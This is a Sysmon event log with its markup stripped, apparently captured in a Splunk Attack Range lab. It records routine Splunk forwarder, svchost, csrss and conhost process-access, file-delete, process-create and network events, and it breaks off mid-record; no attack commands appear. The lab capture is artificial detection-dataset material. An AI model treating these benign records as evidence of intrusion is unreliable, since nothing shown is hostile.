07:56:26.784{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.785{0C1E0330-F5AA-60EB-9379-00000000D001}2668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.659{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AA9EDD0F97900A2E75160A8227D77D1,SHA256=F926F85F9FD9D29419A18FE1484B5B99A8E35F5E4F5D95E2302F64CCEC6735FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:26.657{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10754B97E0EA3833D2ED68F7DC2A35FD,SHA256=D74992F317196E3A7A1CDE8093EFDADE127226FA22D7C72B751EA10AF2005459,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=197F1AFF992C7364ADD3FCE246A44222,SHA256=AAF7901CAC38A586C7BC07FC31753CA51A597F8AF6337E4D71EE8DCBF53C9703,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.237{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:26.222{0C1E0330-F5AA-60EB-9279-00000000D001}2052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000808311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:24.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57319-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.924{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCE4D80A0D80E00653F779258ECB41E0,SHA256=8A06136C69CD235460E9C51AFE3E0EF31089FDF95CA7ABD96F138754F42EF304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.924{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D0FF3C430BF44E4FDB5814BCB9E43A8,SHA256=F755F13C692C53B8025CD00A634C3D9FF981C0F62096557663A04DB0756DC81D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:27.672{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9FE15A38462A0E9EC672F3E9E7EB99C,SHA256=DCF8FC77136666A064C23CDF8051B6799EEF7306E94397A81AB1CA01AB2B5F07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5AB-60EB-9479-00000000D001}1892C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.487{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:27.471{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 